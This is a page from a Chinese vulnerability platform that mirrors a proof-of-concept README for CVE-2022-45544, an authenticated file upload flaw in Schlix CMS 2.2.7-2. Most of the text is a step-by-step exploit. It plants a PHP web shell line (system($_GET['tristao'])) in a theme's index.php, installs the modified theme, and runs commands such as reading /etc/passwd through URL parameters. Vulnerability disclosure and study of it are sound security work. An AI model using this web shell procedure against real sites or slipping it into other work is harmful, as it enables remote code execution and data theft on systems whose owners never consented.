漏洞平台

POC详情： 6ce34e2791ed87e32a797c42aefc759625ed3eb8

来源

https://github.com/tristao-marinho/CVE-2022-45544

关联漏洞

标题： Schlix CMS 安全漏洞 (CVE-2022-45544)
描述：Schlix CMS是一套基于PHP和MySQL的开源内容管理系统（CMS）。 Schlix CMS 2.2.7-2版本存在安全漏洞。攻击者利用该漏洞通过tristao参数上传任意文件并执行任意代码。

描述

SCHLIX CMS 2.2.7-2 arbitrary File Upload

介绍

# CVE-2022-45544
## SCHLIX CMS 2.2.7-2 arbitrary File Upload

#Title:Schlix CMS 2.2.7-2 | Arbitrary File Upload Remote following Code Execution (Authenticated)<br>
#Date: 2022-11-09<br>
#Author: Francisco Marinho<br>
#Vendor Homepage: https://www.schlix.com/<br>
#Software link:https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.7-2.zip<br>
#Version: 2.2.7-2<br>
#Tested on: Linux<br>
<br>
# =========================POC=========================<br>
<br>

1 - Login with your account<br>
2 - Acess the directory in url http://example.com/admin/app/core.thememanager <br>
3 - Download theme Superhero in https://www.schlix.com/extensions.releases/action/download/filename/theme_superhero-1.1.zip<br>
4 - Unzip theme_superhero-1.1.zip<br>
5 - Edit file in path superhero/themes/superhero/index.php, adding "system($_GET['tristao']);" on line three.<br>
6 - Zip theme_superhero-1.1.zip<br>
7 - Click in "INSTALL A PACKAGE"<br>
8 - Upload theme_superhero-1.1.zip<br>
9 - Active theme superhero<br>
10 - Acess homepage index.php<br>
<br>
## Examples:

cat /etc/passwd<br>

http://example.com/index.php?tristao=cat%20%20/etc/passwd<br>

ls -la <br>

http://example.com/index.php?tristao=ls%20%20-la<br>

Procedure video<br>
https://www.youtube.com/watch?v=_0X6AzXmhrU&t=36s

文件快照


 [4.0K]  /data/pocs/6ce34e2791ed87e32a797c42aefc759625ed3eb8
└── [1.2K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。